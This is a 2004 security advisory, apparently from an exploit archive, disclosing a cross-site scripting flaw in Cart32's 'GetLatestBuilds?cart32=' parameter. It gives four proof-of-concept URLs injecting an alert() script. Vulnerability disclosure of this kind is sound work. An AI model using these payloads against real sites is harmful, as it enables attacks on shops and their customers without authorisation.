cart32XSS.txt

cart32XSS.txt: Posted Jul 2, 2004; Authored by Dr Ponidi; Cart32 suffers from an input validation flaw that allows for cross site scripting attacks.; tags | advisory, xss; SHA-256 | f8106fd151c332f8cfb901effa0b209c6a4fea390a67c49519fe4d51dab84f71; Download | Favorite | View

cart32XSS.txt

Indonesia Security Development Team Advisory

Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits
Remote Cross-Site Scripting Attacks 
======================================================================================================


     Advisory Name: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits Remote Cross-Site Scripting Attacks 
          Release Date: 12:50 AM 6/28/04
            Application: Cart32 Shopping Cart 
        Author: Dr`Ponidi <drponidi@indonesia.or.id>
      Discover by: Dr`Ponidi <drponidi@indonesia.or.id>
 Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
         Vendor Status: The vendor has been contacted 
       Vendor URL: http://www.cart32.com
      Reference: http://drponidi.5u.com/advisory.htm
      Greetz to: #indohack #dhegleng Sincan2[at]#malanghackerlink.net



Proof Of Concept:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>



[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment.  Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts 
software and network security assessments.  We provide security 
information and patches for use by the entire network security
community.
 


This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited

Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <drponidi@indonesia.or.id>

Original document can be fount at http://drponidi.5u.com/advisory.htm


--

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

cart32XSS.txt

cart32XSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cart32XSS.txt

Share This

cart32XSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems